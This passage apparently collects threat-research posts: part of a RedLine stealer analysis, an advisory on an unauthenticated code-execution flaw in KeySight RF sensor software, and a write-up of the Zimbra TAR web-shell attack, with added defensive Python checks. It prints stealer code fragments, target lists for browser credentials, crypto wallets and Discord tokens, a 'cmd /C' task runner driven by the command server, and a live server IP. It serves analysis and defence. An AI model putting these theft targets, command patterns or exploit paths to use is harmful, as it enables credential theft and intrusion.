ScanResult.OSVersion = SystemInfoHelper.GetWindowsVersion();

  4. sdf934asd (UserName)

The user name on the compromised machine is assigned to the MachineName field of the ScanResult structure.

ScanResult.MachineName = Environment.UserName;

  5. asdk9345asd (ProcessorInfo)

The Windows Management Instrumentation (WMI) query ‘SELECT * FROM Win32_Processor’ is executed to retrieve processor information. The processor name, number of cores and hardware type are assigned to the Name, Counter and HardType fields, respectively, and the entry is added to the SystemHardwares list of the ScanDetails structure.

ScanResult.ScanDetails.SystemHardwares
{
Name = (managementObject["Name"] as string),
Counter = Convert.ToString(managementObject["NumberOfCores"]),
HardType = HardwareType.Processor
}

  6. a03md9ajsd (GraphicInfo)

The WMI query ‘SELECT * FROM Win32_VideoController’ is executed to retrieve graphics adapter information. The adapter name, AdapterRAM and hardware type are assigned to the Name, Counter and HardType fields, respectively, and the entry is added to the SystemHardwares list of the ScanDetails structure.

ScanResult.ScanDetails.SystemHardwares
{
Name = (managementObject["Name"] as string),
Counter = Convert.ToUInt32(managementObject["AdapterRAM"]).ToString(),
HardType = HardwareType.Graphic
}

  7. asdk8jasd (BrowsersInfo)

Installed browser information is retrieved from the registry key ‘HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Clients\StartMenuInternet’ on 64-bit machines and ‘HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet’ on 32-bit machines. The name of each subkey, the file path stored in its ‘shell\open\command’ value and the version information read from that file are assigned to NameOfBrowser, PathOfFile and Version, respectively, and the entry is added to the InstalledBrowsers list of the ScanDetails structure.

ScanResult.ScanDetails.InstalledBrowsers
{
NameOfBrowser : registry subkey name
PathOfFile    : subkey value for ‘shell\open\command’
Version       : version information from the browser’s executable
}

  8. лыв7рыва2 (RAM size)

The WMI query ‘SELECT TotalVisibleMemorySize FROM Win32_OperatingSystem’ is used to retrieve the amount of Random Access Memory (RAM) on the compromised machine. ‘Total of RAM’, Graphic and the RAM size are assigned to the Name, HardType and Counter fields, respectively, and the entry is added to the SystemHardwares list of the ScanDetails structure.

ScanResult.ScanDetails.SystemHardwares
{
Name = “Total of RAM”,
HardType = HardwareType.Graphic,
Counter = SystemInfoHelper.TotalOfRAM()
}

  9. ылв92р34выа (SoftwaresInfo)

Installed software information is retrieved from the registry key ‘HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall’. The display name and version of each entry are combined as <DisplayName> [<DisplayVersion>] and added to the Softwares list of the ScanDetails structure.

ScanResult.ScanDetails.Softwares = SystemInfoHelper.ListOfPrograms();

  10. аловй (SecurityProductsInfo)

WMI queries against the ‘ROOT\\SecurityCenter2’ or ‘ROOT\\SecurityCenter’ namespace are used to retrieve information about the installed security products:

  • SELECT * FROM AntivirusProduct
  • SELECT * FROM AntiSpyWareProduct
  • SELECT * FROM FirewallProduct

The DisplayName of each product is added to the SecurityUtils list of the ScanDetails structure.

  11. ыал8р45 (ProcessesInfo)

The WMI query ‘SELECT * FROM Win32_Process Where SessionId=’Process.GetCurrentProcess().SessionId’’ is used to retrieve information about the processes in the current session. ProcessId, Name and CommandLine are concatenated as ‘ID: <ProcessId>, Name: <Name>, CommandLine: <CommandLine>’ and added to the Processes list of the ScanDetails structure.

ScanResult.ScanDetails.Processes = SystemInfoHelper.ListOfProcesses();

  12. ываш9р34 (InstalledLanguagesInfo)

The installed input languages are added to the AvailableLanguages list of the ScanDetails structure.

ScanResult.ScanDetails.AvailableLanguages = SystemInfoHelper.AvailableLanguages();

  13. длвап9345 (ScreenCapture)

If the ScanScreen flag is enabled, the screen is captured as a PNG image, which is converted to a byte array and stored in the Monitor field of the ScanResult structure. The threat actor can use the screenshot to identify whether the malware is running under a monitoring tool in a controlled environment.

  14. ывал8н34 (TelegramFiles)

If the ScanTelegram flag is enabled, the running processes are enumerated to find ‘Telegram.exe’. If a Telegram process is found, the Telegram installation directory is taken from the executable’s path; otherwise the default path ‘%APPDATA%\Telegram Desktop’ is used. The malware looks for subdirectories with 16-character names inside the Telegram installation directory and adds each of them to the list of FileScannerArg entries, along with the path ‘<Telegram Installation Directory>\tdata’.

FileScannerArg
{
Directory  : “One of the scan directories”
Pattern    : “*”
Recoursive : false
Tag        : “sequence number”
}

Scanning a FileScannerArg entry means searching for files that match the pattern and collecting the file body, user profile name, application name, file name and file path; each result is added to the MessageClientFiles list of the ScanDetails structure.

ScannedFile
{
Body              : content of the file
DirfOfFile        : profile directory name
NameOfApplication : application name or the directory sequence number
NameOfFile        : file name
PathOfFile        : null
}

  15. вал93тфыв (BrowsersData)

If the ScanBrowsers flag is enabled, the directory paths in ScanningArgs.ScanChromeBrowsersPaths and ScanningArgs.ScanGeckoBrowsersPaths are retrieved and enumerated to locate the files in which the browsers store user data. These files are decrypted, the recovered data is stored in ScannedBrowser structures, and each structure is added to the Browsers list of the ScanDetails structure.

ScannedBrowser
{
Autofills      : list of autofill entries
BrowserName    : browser name
BrowserProfile : browser profile
CC             : list of cards (HolderName, Month, Number, Year)
Cookies        : list of ScannedCookies (Expires, Host, Http, Name, Path, Secure, Value)
Logins         : list of Accounts (Password, URL, Username)
}

  16. вашу0л34 (SensitiveFiles)

If the ScanFiles flag is enabled, each entry of the ScanFilesPaths list in ScanningArgs is split on “|” into the directory to search, the file name patterns, the recursive-search flag and an optional maximum file size.

ScanningArgs.ScanFilesPaths
{
"%userprofile%\\Desktop|*.txt,*.doc*,*key*,*wallet*,*seed*|0"   string
"%userprofile%\\Documents|*.txt,*.doc*,*key*,*wallet*,*seed*|0" string
}

Directory               Patterns                            Recursive
%userprofile%\Desktop   *.txt,*.doc*,*key*,*wallet*,*seed*  0
%userprofile%\Documents *.txt,*.doc*,*key*,*wallet*,*seed*  0

If the directory is “%DSK_32%”, the malware scans all logical drives recursively, excluding file paths that contain any of the sub-paths below. The default maximum size of a file to be collected is 3097152 bytes:

  • ‘\\Windows\\’
  • ‘\\Program Files\\’
  • ‘\\Program Files (x86)\\’
  • ‘\\Program Data\\’
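
As an added example for analysts (not RedLine's own code), the parser below turns ScanFilesPaths entries in the “directory|patterns|recursive[|max_size]” form into structured rules, applying the “%DSK_32%” all-drives handling, the default 3097152-byte size limit and the excluded sub-paths described above, so a configuration extracted from a sample can be reviewed or turned into file-monitoring rules. The ScanRule field names and the third sample entry are constructed for the example.

```python
"""Parse RedLine-style ScanFilesPaths entries into structured scan rules.

Added example for this write-up, not the malware's own code. Entry format, as
described in the analysis: "<directory>|<pattern1,pattern2,...>|<recursive>[|<max_size>]".
The ScanRule field names are assumptions.
"""
from dataclasses import dataclass, field
from typing import List

DEFAULT_MAX_FILE_SIZE = 3097152          # default limit stated in the analysis
ALL_DRIVES_TOKEN = "%DSK_32%"            # directory value meaning "every logical drive"
EXCLUDED_SUBPATHS = (                    # sub-paths skipped in all-drives mode
    "\\Windows\\",
    "\\Program Files\\",
    "\\Program Files (x86)\\",
    "\\Program Data\\",
)


@dataclass
class ScanRule:
    directory: str
    patterns: List[str]
    recursive: bool
    max_size: int = DEFAULT_MAX_FILE_SIZE
    excluded: List[str] = field(default_factory=list)

    @property
    def all_drives(self) -> bool:
        return self.directory == ALL_DRIVES_TOKEN


def parse_scan_rule(entry: str) -> ScanRule:
    """Split one "|"-separated entry; a missing or empty size field means the default."""
    parts = entry.split("|")
    if len(parts) < 3:
        raise ValueError(f"malformed ScanFilesPaths entry: {entry!r}")
    directory, patterns, recursive = parts[0], parts[1], parts[2].strip()
    size_field = parts[3].strip() if len(parts) > 3 else ""
    rule = ScanRule(
        directory=directory,
        patterns=[p.strip() for p in patterns.split(",") if p.strip()],
        recursive=recursive not in ("", "0", "false", "False"),
        max_size=int(size_field) if size_field else DEFAULT_MAX_FILE_SIZE,
    )
    if rule.all_drives:
        # "%DSK_32%" always walks every drive recursively and skips the system directories
        rule.recursive = True
        rule.excluded = list(EXCLUDED_SUBPATHS)
    return rule


def parse_config(entries):
    return [parse_scan_rule(e) for e in entries]


def is_excluded(rule: ScanRule, path: str) -> bool:
    """Case-insensitive substring match, mirroring the 'path contains sub-path' rule."""
    lowered = path.lower()
    return any(sub.lower() in lowered for sub in rule.excluded)


# Constructed sample: the two entries shown in the analysis plus an all-drives entry
# with an explicit 1 MiB limit (the third entry is invented for illustration)
SAMPLE_CONFIG = [
    "%userprofile%\\Desktop|*.txt,*.doc*,*key*,*wallet*,*seed*|0",
    "%userprofile%\\Documents|*.txt,*.doc*,*key*,*wallet*,*seed*|0",
    "%DSK_32%|*wallet*,*seed*|1|1048576",
]

if __name__ == "__main__":
    for rule in parse_config(SAMPLE_CONFIG):
        print(rule)
```

The exclusion check is a plain substring match because the analysis describes the filter as “file paths containing” the listed sub-paths; a stricter prefix match would miss paths the malware itself skips.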

Scanning a FileScannerArg entry means searching for files that match the pattern and collecting the file body, file directory, application name, file name and file path; each result is added to the ScannedFiles list of the ScanDetails structure.

ScannedFile
{
Body              : content of the file
DirfOfFile        : file directory
NameOfApplication : null
NameOfFile        : file name
PathOfFile        : file path
}

  17. навева (FileZillaCredentials)

If the ScanFTP flag is enabled, the FileZilla files “%APPDATA%\FileZilla\recentservers.xml” and “%APPDATA%\FileZilla\sitemanager.xml” are parsed to retrieve the URL, port, user name and password of each saved server; the values are assigned to an Account structure, which is added to the FtpConnections list of the ScanDetails structure.

Account
{
URL      : FTP URL along with the port number
Username : user name
Password : password
}

  18. ащы9р34 (DigitalWallets)

If the ScanWallets flag is enabled, the paths of digital currency wallets, including the extension storage paths of Chromium-based browsers, are added to FileScannerArg entries along with their Pattern and Recoursive flag values.

browserExtensionsRule.SetPaths(settings.ScanChromeBrowsersPaths);
result.ScanDetails.ScannedWallets.AddRange(FileScanner.Scan(
new ArmoryRule(),
new AtomicRule(),
new CoinomiRule(),
new ElectrumRule(),
new EthRule(),
new ExodusRule(),
new GuardaRule(),
new Jx(),
new AllWalletsRule(),
browserExtensionsRule));

Directory                       Pattern   Recursive  Tag
%APPDATA%\Armory                *.wallet  false      null
%APPDATA%\atomic                *         true       null
%APPDATA%\Coinomi               *         true       null
%APPDATA%\Ethereum\wallets      *         false      null
%APPDATA%\Exodus                *.json    false      null
%APPDATA%\Exodus\exodus.wallet  *         false      null
%APPDATA%\Guarda                *         true       null
%APPDATA%\com.liberty.jaxx      *         true       null

Directory Pattern Recursive Tag
<ChromiumBrowsersDataDir>\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb * false <browser_name>_YoroiWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec * false <browser_name>_Tronlink
<ChromiumBrowsersDataDir>\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid * false <browser_name>_NiftyWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn * false <browser_name>_Metamask
<ChromiumBrowsersDataDir>\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc * false <browser_name>_MathWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad * false <browser_name>_Coinbase
<ChromiumBrowsersDataDir>\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp * false <browser_name>_BinanceChain
<ChromiumBrowsersDataDir>\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfcl * false <browser_name>_BraveWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln * false <browser_name>_GuardaWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac * false <browser_name>_EqualWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne * false <browser_name>_JaxxxLiberty
<ChromiumBrowsersDataDir>\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi * false <browser_name>_BitAppWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj * false <browser_name>_iWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih * false <browser_name>_Wombat
<ChromiumBrowsersDataDir>\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh * false <browser_name>_AtomicWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm * false <browser_name>_MewCx
<ChromiumBrowsersDataDir>\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj * false <browser_name>_GuildWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig * false <browser_name>_SaturnWallet
<ChromiumBrowsersDataDir>\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec * false <browser_name>_RoninWallet

 

Scanning the FileScannerArg entries means searching for files that match the pattern and collecting the file body, file directory, application name, file name and file path; each result is added to the ScannedFiles list of the ScanDetails structure.

  19. ыва83о4тфыв (DiscordToken)

If the ScanDiscord flag is enabled, the directory ‘%appdata%\discord\Local Storage\leveldb’ is added to FileScannerArg with the patterns *.log and *.ldb and the Recoursive flag set to false.

Scanning the FileScannerArg entry means searching for files that match the pattern and collecting the file body, file directory, application name, file name and file path; each result is added to the GameChatFiles list of ScanDetails. The file body is then matched against the regular expression ‘[A-Za-z\d]{24}\.[\w-]{6}\.[\w-]{27}’ to extract the Discord token, and the match replaces the file body in the ScannedFile structure.

ScannedFile
{
Body              : text matching the regular expression in the file content
DirfOfFile        : file directory
NameOfApplication : null
NameOfFile        : Tokens.txt
PathOfFile        : file path
}

  20. askd435

If the ScanSteam flag is enabled, the Steam installation path is retrieved from the registry key ‘HKEY_CURRENT_USER\SOFTWARE\Valve\Steam’ and added to FileScannerArg along with the Pattern and Recoursive flag.

Directory                       Patterns  Recursive
<SteamInstallationPath>         *ssfn*    0
<SteamInstallationPath>\config  *.vsdf    0

Scanning the FileScannerArg entries means searching for files that match the pattern and collecting the file body, file directory, application name, file name and file path; each result is added to the GameLauncherFiles list of the ScanDetails structure.

  21. sdi845sa (VPNFiles)

If the ScanVPN flag is enabled, the directory paths for OpenVPN and ProtonVPN are added to FileScannerArg. The malware also contains artifacts indicating that NordVPN file theft is either used in another variant or planned for an upcoming one.

Directory                                               Patterns  Recursive
%USERPROFILE%\AppData\Roaming\OpenVPN Connect\profiles  *ovpn*    0
%USERPROFILE%\AppData\Local\ProtonVPN                   *.vsdf    0

Scanning the FileScannerArg entries means searching for files that match the pattern and collecting the file body, file directory, application name, file name and file path for OpenVPN and ProtonVPN; the results are added to the Open and Proton lists of the ScanDetails structure.

ScannedFile
{
Body              : file content
DirfOfFile        : null
NameOfApplication : null
NameOfFile        : name of file
PathOfFile        : file path
}

  22. asd44123

The primary screen size (width, height) is retrieved and assigned to the Resolution field of the ScanResult structure.

If the directory ‘%APPDATA%\Yandex\YaAddon’ exists on the compromised machine, the malware assumes it has already run there and sets the SeenBefore field of the ScanResult structure. If the directory is not found, the SeenBefore field is reset and the directory ‘%APPDATA%\Yandex\YaAddon’ is created.

ScanResult.SeenBefore = SeenBefore();

The malware then enumerates the filled structures and replaces empty values with ‘UNKNOWN’.

String Obfuscation

Strings are broken into substrings and individual characters to defeat string-based detections and static analysis. The malware also inserts garbage characters into the original string, which are replaced before the string is used.

geoInfo.IP = Encoding.UTF8.GetString(new WebClient().DownloadData(new string(new char[21] {
'h', 't', 't', 'p', 's', ':', '/', '/', 'a', 'p',
'i', '.', 'i', 'p', 'i', 'f', 'y', '.', 'o', 'r',
'g'
}))).Replace("\n", "");
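
Added example (not RedLine's code): a small Python routine that recovers string literals split into char arrays, in the way shown above, from decompiled C# text. The optional junk parameter removes the garbage characters the malware inserts; the analysis does not state which characters are used, so the caller supplies them. The second sample literal is constructed.

```python
"""Recover string literals that were split into char arrays in decompiled C# code.

Added example for this write-up; not RedLine's own code. It handles the
`new string(new char[N] { 'a', 'b', ... })` pattern shown in the analysis. The
`junk` parameter models the garbage characters the analysis mentions; which
characters the malware inserts is not stated, so the caller supplies them.
"""
import re

# Matches: new string(new char[21] { 'h', 't', ... })   (the array length is optional)
CHAR_ARRAY_RE = re.compile(
    r"new\s+string\s*\(\s*new\s+char\s*\[\s*(\d*)\s*\]\s*\{(.*?)\}\s*\)",
    re.DOTALL,
)
# Matches one C# character literal, including simple escapes such as '\\' and '\''
CHAR_LITERAL_RE = re.compile(r"'((?:\\.|[^'\\]))'")

# Simple escape sequences that can appear inside a C# char literal
ESCAPES = {
    "\\n": "\n", "\\t": "\t", "\\r": "\r", "\\0": "\0",
    "\\\\": "\\", "\\'": "'", "\\\"": '"',
}


def decode_char_literal(lit: str) -> str:
    """Turn the text between the quotes of one char literal into the character."""
    if lit in ESCAPES:
        return ESCAPES[lit]
    return lit[1:] if lit.startswith("\\") else lit


def rebuild_string(array_body: str, declared_len=None) -> str:
    """Join the char literals of one array body; check the declared length if present."""
    chars = [decode_char_literal(m.group(1)) for m in CHAR_LITERAL_RE.finditer(array_body)]
    if declared_len is not None and len(chars) != declared_len:
        raise ValueError(f"array declares {declared_len} chars but {len(chars)} literals found")
    return "".join(chars)


def recover_strings(decompiled: str, junk: str = ""):
    """Return every reconstructed string in `decompiled`, with junk characters removed."""
    out = []
    for m in CHAR_ARRAY_RE.finditer(decompiled):
        declared = int(m.group(1)) if m.group(1) else None
        s = rebuild_string(m.group(2), declared)
        for j in junk:
            s = s.replace(j, "")
        out.append(s)
    return out


# Constructed sample: the snippet from the analysis plus a second, invented literal
# that carries '#' as a garbage character
SAMPLE = r'''
geoInfo.IP = Encoding.UTF8.GetString(new WebClient().DownloadData(new string(new char[21] {
'h', 't', 't', 'p', 's', ':', '/', '/', 'a', 'p',
'i', '.', 'i', 'p', 'i', 'f', 'y', '.', 'o', 'r',
'g'
}))).Replace("\n", "");
string marker = new string(new char[] { 'Y', '#', 'a', 'A', '#', 'd', 'd', 'o', 'n' });
'''

if __name__ == "__main__":
    for s in recover_strings(SAMPLE, junk="#"):
        print(s)
```

Running the recovered strings through a YARA or string-extraction step after decompilation gives back the detection-relevant values (URLs, paths, markers) that the char-array form hides from a plain strings pass.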

 

C&C Communication

RedLine sends the structure containing the data stolen from the compromised machine to the C&C server over a SOAP API and receives a list of tasks, each consisting of TaskID, TaskArg, Action and DomainFilter.

public class UpdateTask
{
public int TaskID { get; set; }
public string TaskArg { get; set; }
public UpdateAction Action { get; set; }
public string DomainFilter { get; set; }
}

The malware defines 5 task actions, but the RunPE action is not supported in this variant.

public enum UpdateAction
{
Download,
RunPE,
DownloadAndEx,
OpenLink,
Cmd
}

Action Commands

Cmd

Executes the TaskArg value with the Command Prompt executable and waits up to 30 seconds for it to finish:

System.Diagnostics.Process.Start(new ProcessStartInfo("cmd", "/C " + updateTask.TaskArg)
{
UseShellExecute = false,
CreateNoWindow = true
}).WaitForExit(30000);

Download

Retrieves the download URL and the file path from the TaskArg field, separated by “|”. The file is downloaded from the URL and saved to the file path.

DownloadAndEx

Retrieves the download URL and the file path from the TaskArg field, separated by “|”. The file is downloaded from the URL and executed, with the current working directory set to the directory containing the downloaded file.

OpenLink

TaskArg is started as a new process.

After completing a task on the compromised machine, the malware reports the TaskID of the UpdateTask back to the C&C server.

Indicators Of Compromise

Follina

20aa70539f31bd9cafba21a89b06857298f64f2cca97869e7cf6532927016877

 

Protection Layers

3354174f028a2682fa83d1b8bce2cf90fa39534f108f9902c2d5ecd644ad8421 (Layer 1)

846e9ae1f5cb837efc5a96ebfff3b846fa48433d19426b869c2bfbe80c90479a (Layer 2)

97024f17003dd3d31dab64c4d1b8251e50d428644eb59ed3692ad79ce42019cf (Layer 3, RunPE)

 

RedLine

4799408b9b05bdf02da7807a3e3e253f35fb2e57cc55e28cb8fe3b181825bb29

 

C&C Server

45.155.165.19:24150

 

References

https://www.proofpoint.com/us/blog/threat-insight/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign

https://github.com/NYAN-x-CAT/CSharp-RunPE

https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

 

KeySight RF Sensor Vulnerability

Overview:

  SonicWall Capture Labs Threat Research Team has observed the following threat:

  KeySight N6854A Geolocation server software and the N6841A RF Sensor software provide an easy way to configure all of the RF Sensors in a network. They provide diagnostic and firmware update tools, along with a color-coded health status indicator for each sensor. A user can upload and geo-align maps to show sensor placement and geolocation results via a heat-map overlay, pinpointing the location of unknown RF emitters. Additionally, users can create launchers to quickly start software applications on one or multiple sensors at the same time. The Geolocation server software is tightly integrated with the N6820ES Surveyor 4D software to form a spectrum monitoring and emitter location system.

  An SQL injection exists in KeySight N6854A and N6841A RF Sensor. The vulnerability is due to insufficient input validation when restoring databases from arbitrary network locations.

  A remote, unauthenticated attacker can exploit this vulnerability by sending maliciously crafted packets to the target server. Successful exploitation could result in execution of arbitrary code on the target server in the context of SYSTEM.

  Vendor Homepage

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2022-38130.

  CVE Listing

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.7 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.7 (E:U/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is unproven.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

  CVSS Calculator Metrics

Technical Overview:

  The vulnerability is due to a lack of authentication controls on the exposed Spring HTTP Invoker endpoints, combined with the retrieval of a ZIP file from a remote, attacker-controlled server. When a user clicks the “Tools->Database->Restore Database” button, an HTTP request to “/server/service/smsConfigServiceHttpInvoker” is sent over localhost on port 8080 to KeysightSMS.exe. This request invokes the handleRequest() method of the Spring Framework HttpInvokerServiceExporter class, which deserializes a RemoteInvocation object from the serialized data received in the request. An attacker can provide a serialized object that invokes the method smsRestoreDatabaseZip() in the Java class WEBINF.classes.com.keysight.tentacle.config.ResourceManager. This method takes as input the path to the ZIP archive file.

  The code specifically looks for the file tentacle.script in the ZIP archive, which after extraction is passed as an argument when executing the MigrateDatabase.bat script. This batch script executes all of the SQL commands present in the given tentacle.script file to update or restore the HSQLDB database that is part of the SMS tool. However, the code does not prevent an attacker from supplying a UNC path and thereby downloading an arbitrary ZIP archive (and tentacle.script file) to be used in restoring the database on the target machine. The attacker can therefore execute arbitrary SQL commands on the target machine without any authentication. Since the SMS tool uses HSQLDB, and this database allows execution of arbitrary Java static methods, an attacker can craft a malicious tentacle.script file which can, for instance, create files on the target machine at arbitrary locations and with arbitrary data. For instance, executing the following SQL commands will result in the creation of a shortcut file in the directory “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp” that opens a calculator on the target machine whenever Windows is restarted:

Triggering the Problem:

  • The target must have the vulnerable software installed.
  • The attacker must have network connectivity to the target server.

Triggering Conditions:

  The attacker sends an HTTP request containing a malicious serialized Java object to the target server that downloads the malicious ZIP file from an attacker-controlled server. The vulnerability is triggered when the server processes the downloaded file.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP
    • HTTPS

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 3323 KeySight N6854A/N6841A Insecure Deserialization 3

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Upgrading the product to a non-vulnerable version.
    • Detecting and filtering malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory
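
One defensive check that follows from the description above, added here as an example and not part of the advisory or of KeySight's software: since the legitimate restore request to /server/service/smsConfigServiceHttpInvoker is issued over localhost, a request to that endpoint from any other source address is anomalous. The script below applies that rule to web-server access log lines. The log format (a combined-log style line), the POST-only filter and the sample entries are assumptions constructed for the example.

```python
"""Flag HTTP Invoker requests to the KeySight SMS endpoint that do not come from localhost.

Added example for this write-up, not vendor code. The analysis states that the legitimate
"Restore Database" request is sent over localhost on port 8080 to the
/server/service/smsConfigServiceHttpInvoker endpoint, so the same endpoint being reached
from any other source address is worth an alert. The log line format (combined-log style),
the POST-only filter and the sample lines are assumptions made for this example.
"""
import ipaddress
import re
from dataclasses import dataclass

INVOKER_PATH = "/server/service/smsConfigServiceHttpInvoker"

# <src> <ident> <user> [<timestamp>] "<method> <path> <proto>" <status> <size>
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


@dataclass
class Alert:
    src: str
    ts: str
    path: str
    reason: str


def is_loopback(addr: str) -> bool:
    """True for 127.0.0.0/8 and ::1; hostnames or garbage never count as loopback."""
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def check_line(line: str):
    """Return an Alert for a remote POST to the invoker endpoint, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    if m.group("path").split("?", 1)[0] != INVOKER_PATH:
        return None
    if m.group("method") != "POST":
        # Assumption: only POST bodies carry a serialized RemoteInvocation
        return None
    if is_loopback(m.group("src")):
        return None
    return Alert(m.group("src"), m.group("ts"), m.group("path"),
                 "remote client reached localhost-only HTTP Invoker endpoint")


def scan(lines):
    return [a for a in (check_line(l) for l in lines) if a is not None]


# Constructed sample lines: a legitimate local restore, a remote POST to the same
# endpoint, and an unrelated remote request
SAMPLE_LOG = [
    '127.0.0.1 - - [10/Oct/2022:09:12:01 +0000] "POST /server/service/smsConfigServiceHttpInvoker HTTP/1.1" 200 512',
    '192.0.2.44 - - [10/Oct/2022:09:13:27 +0000] "POST /server/service/smsConfigServiceHttpInvoker HTTP/1.1" 200 512',
    '192.0.2.44 - - [10/Oct/2022:09:13:30 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The same rule can be expressed as a firewall policy (allow TCP/8080 to that path only from the host itself), which is the compensating control for installations that cannot be upgraded immediately; the log check then serves as verification that the policy holds.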

Zimbra Collaboration Suite TAR Remote Code Execution

Zimbra Collaboration Suite (ZCS) is a collection of tools that includes an email server, a chat server, a file sharing server, a shared calendar and an email client. The application’s web mail client and admin console can be accessed over HTTP. Amavisd runs as a daemon process and listens on TCP port 10024 for incoming SMTP connections. GNU cpio is a tool for creating and extracting archives, or copying files from one place to another. It handles many cpio formats and can read and write TAR files.

Zimbra TAR Remote Code Execution | CVE-2022-41352
An issue was discovered in ZCS 8.8.15 and 9.0. An attacker can upload arbitrary files through amavisd via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. This vulnerability, tracked as CVE-2022-41352 (CVSS score 9.8), is a remote code execution flaw that allows attackers to send an email with a malicious archive attachment. The attachment bypasses antivirus checks and plants a web shell on the ZCS server.
The root cause of the vulnerability is the use of the ‘cpio’ file archiving utility to extract archives when Amavisd scans a file for viruses. The cpio component has a flaw that allows an attacker to create archives that can be extracted anywhere on a filesystem accessible to Zimbra.
When an email is sent to a Zimbra server, the Amavis security system extracts the archive to perform a virus scan of its contents. However, if it extracts a specially crafted .cpio, .tar or .rpm archive, the contents can be written to the Zimbra webroot.

In the following exploit the attacker sends an email with the subject line ‘News’ that contains the malicious attachments news.jpg and news.jpeg.

Both attachments are specially crafted .tar files named with .jpg and .jpeg extensions.

They contain a JSP file named ResourceVerificaton.jsp that could deploy web shells to the Zimbra root, effectively giving the attacker shell access to the server.
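
Added example (not Zimbra's, Amavis's or cpio's code): a check a mail gateway or analyst can run on an attachment before any archiver touches it, rejecting TAR members whose path or link target would land outside the extraction directory. It uses Python's tarfile module; the two archives are constructed in memory, and the destination directory is an assumed placeholder.

```python
"""Check a TAR archive for members that would escape the extraction directory.

Added example for this write-up; it is not Zimbra's, Amavis's or cpio's code. The
analysis describes archives crafted so that extraction lands outside the intended
directory; this check models what a scanner can do before handing an attachment to an
archiver: reject absolute paths, ".." components, special files, and links that resolve
outside the destination. The sample archives are constructed in memory and the
destination directory is a placeholder.
"""
import io
import os
import posixpath
import tarfile


def _resolves_inside(dest: str, member_path: str) -> bool:
    """True if dest/member_path normalises to a location under dest."""
    dest = os.path.abspath(dest)
    target = os.path.abspath(os.path.join(dest, member_path))
    return target == dest or target.startswith(dest + os.sep)


def unsafe_members(tar_bytes: bytes, dest: str = "/tmp/extract"):
    """Return (member_name, reason) for every entry that must not be extracted."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tf:
        for m in tf.getmembers():
            name = m.name
            if posixpath.isabs(name):
                findings.append((name, "absolute path"))
            elif ".." in name.split("/"):
                findings.append((name, "parent-directory traversal"))
            elif not _resolves_inside(dest, name):
                findings.append((name, "escapes destination"))
            elif m.issym() or m.islnk():
                # Symlink targets are relative to the member's directory;
                # hard-link targets are relative to the archive root.
                base = posixpath.dirname(name) if m.issym() else ""
                target = m.linkname
                if posixpath.isabs(target) or not _resolves_inside(dest, posixpath.join(base, target)):
                    findings.append((name, "link points outside destination"))
            elif m.isdev() or m.isfifo():
                findings.append((name, "special file"))
    return findings


def is_safe(tar_bytes: bytes, dest: str = "/tmp/extract") -> bool:
    return not unsafe_members(tar_bytes, dest)


def _build_tar(entries):
    """Constructed helper: build an in-memory TAR from (name, payload, kind) tuples."""
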